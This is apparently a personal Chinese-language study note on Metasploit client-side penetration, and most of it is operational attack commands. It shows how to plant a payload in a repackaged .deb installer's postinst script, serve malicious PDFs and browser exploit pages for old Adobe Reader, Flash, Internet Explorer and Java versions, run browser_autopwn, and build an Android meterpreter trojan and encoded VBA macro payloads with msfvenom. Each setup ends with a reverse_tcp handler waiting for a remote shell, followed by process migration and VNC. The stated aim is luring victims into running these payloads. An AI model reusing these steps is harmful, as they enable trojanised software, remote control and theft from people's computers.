MSF学习(11)客户端渗透
十:客户端渗透
社会工程学,进而渗透线上业务网络
含有漏洞利用代码的web站点
含有漏洞利用代码的doc,pdf等文档
诱骗被害者执行payload
1:诱骗被害者执行payload(windows)
可以自己学习
这个我没有环境,没办法了,可以去学习下msfvenom
2:诱骗被害者执行payload(liunx deb安装包)
下载deb包,再在文件下插入payload,诱导执行
Deb文件都在这个目录下
root@kali:/var/cache/apt/archives# apt-get --download-only install freesweep
root@kali:/var/cache/apt/archives# cp freesweep_1.0.1-1_amd64.deb /root/
root@kali:/var/cache/apt/archives# cd
root@kali:~# dpkg -x freesweep_1.0.1-1_amd64.deb free
root@kali:~# cd free
root@kali:~/free# mkdir DEBIAN
root@kali:~/free# cd DEBIAN/
root@kali:~/free/DEBIAN# vi control(写入版本信息等)
root@kali:~/free/DEBIAN# vi postinst(写入powershell)
然后利用payload
执行再打包
3:利用Acrobat reader 漏洞执行payload
(1)构造pdf文件 Windows XP
msf5 > use exploit/windows/fileformat/adobe_utilprintf
msf5 exploit(windows/fileformat/adobe_utilprintf) > set lhost 192.168.1.10
msf5 exploit(windows/fileformat/adobe_utilprintf) > exploit
把pdf压缩再移到本机网页上
从网站中下载192.1.1.10/1.zip
使用模块监听
msf5 exploit(windows/fileformat/adobe_utilprintf) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tc
msf5 exploit(multi/handler) > set lhost 192.168.1.10
msf5 exploit(multi/handler) > exploit
在windowsXP打开pdf即可得到shell
得到shell,
迁移进程到系统进程,防止进程被关闭
Adobe要小于8.1.3
(2)构造恶意网站
msf5 exploit(windows/fileformat/adobe_utilprintf) > use exploit/windows/browser/adobe_utilprintf
msf5 exploit(windows/browser/adobe_utilprintf) > show options
msf5 exploit(windows/browser/adobe_utilprintf) > set srvport 80(处理下端口,不然可能会占用)
msf5 exploit(windows/browser/adobe_utilprintf) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/browser/adobe_utilprintf) > set lhost 192.168.1.10
msf5 exploit(windows/browser/adobe_utilprintf) > set URIPATH /
可以设置根网址,不设置的话会随机字符串
msf5 exploit(windows/browser/adobe_utilprintf) > exploit
点击即可
拿到shell
如果报错则杀进程重来
lsof -i:port(端口):查看端口使用情况
Kill -9 (进程pid):杀死端口进程
meterpreter > getpid
meterpreter > ps
meterpreter > migrate 716
meterpreter > bgrun vnc
4:使用flash插件漏洞执行payload
(1)
msf5 > use exploit/multi/browser/adobe_flash_hacking_team_uaf(针对flash18.194)
msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > show options
msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set srvport 7498
msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set URIPATH /
msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set lhost 192.168.1.10
msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > show targets
msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > set target 0
msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > exploit
(2)18.203
msf5 exploit(multi/browser/adobe_flash_hacking_team_uaf) > use exploit/multi/browser/adobe_flash_opaque_background_uaf
差不多,都是,不浪费时间了,注意版本问题
(3) 浏览器漏洞利用模块打包
模块会自动指定payload,会自动使用漏洞利用模块
msf5 > use auxiliary/server/browser_autopwn
msf5 auxiliary(server/browser_autopwn) > show options
msf5 auxiliary(server/browser_autopwn) > set URIPATH /
msf5 auxiliary(server/browser_autopwn) > set lhost 192.168.1.10
msf5 auxiliary(server/browser_autopwn) > exploit
20个模块已被利用,然后会再进行一个一个的试
Windows7访问192.168.1.10:8080
可以看到已经开始了
5:利用ie浏览器漏洞执行payload
msf5 > use exploit/windows/browser/ms14_064_ole_code_execution
msf5 exploit(windows/browser/ms14_064_ole_code_execution) > show options
得到shell即可
6:利用JRE漏洞执行payload(1.6,1.7版本)
(1)
msf5 > use exploit/multi/browser/java_jre17_driver_manager
msf5 exploit(multi/browser/java_jre17_driver_manager) > show options
(2)
msf5 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/browser/java_jre17_jmxbean
msf5 exploit(multi/browser/java_jre17_jmxbean) > show options
(3)
msf5 exploit(multi/browser/java_jre17_jmxbean) > use exploit/multi/browser/java_jre17_reflection_types
msf5 exploit(multi/browser/java_jre17_reflection_types) > show options
7:生成安卓后门程序
msf5 > use payload/android/meterpreter/reverse_tcp
我没有进行成功所以找了一个来测试
以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径
(1)生成安卓木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=5555 R > /root/kk.apk
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.10
msf5 exploit(multi/handler) > set lport 5555
msf5 exploit(multi/handler) > exploit
安装打开安卓软件即可,当然没有免杀,所有需要允许安装
效果如下
但权限不高
参考:https://www.cnblogs.com/hkleak/p/4852057.html
8:VBScript感染方式
利用宏感染word,excel文档
可以复现一下https://www.jianshu.com/p/8ca521439792
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=3333 -e x86/shikata_ga_nai -f vba-exe
分为两步
设置监听和payload,把防火墙关了,直接感染了windows10
权限好像不高,需要提权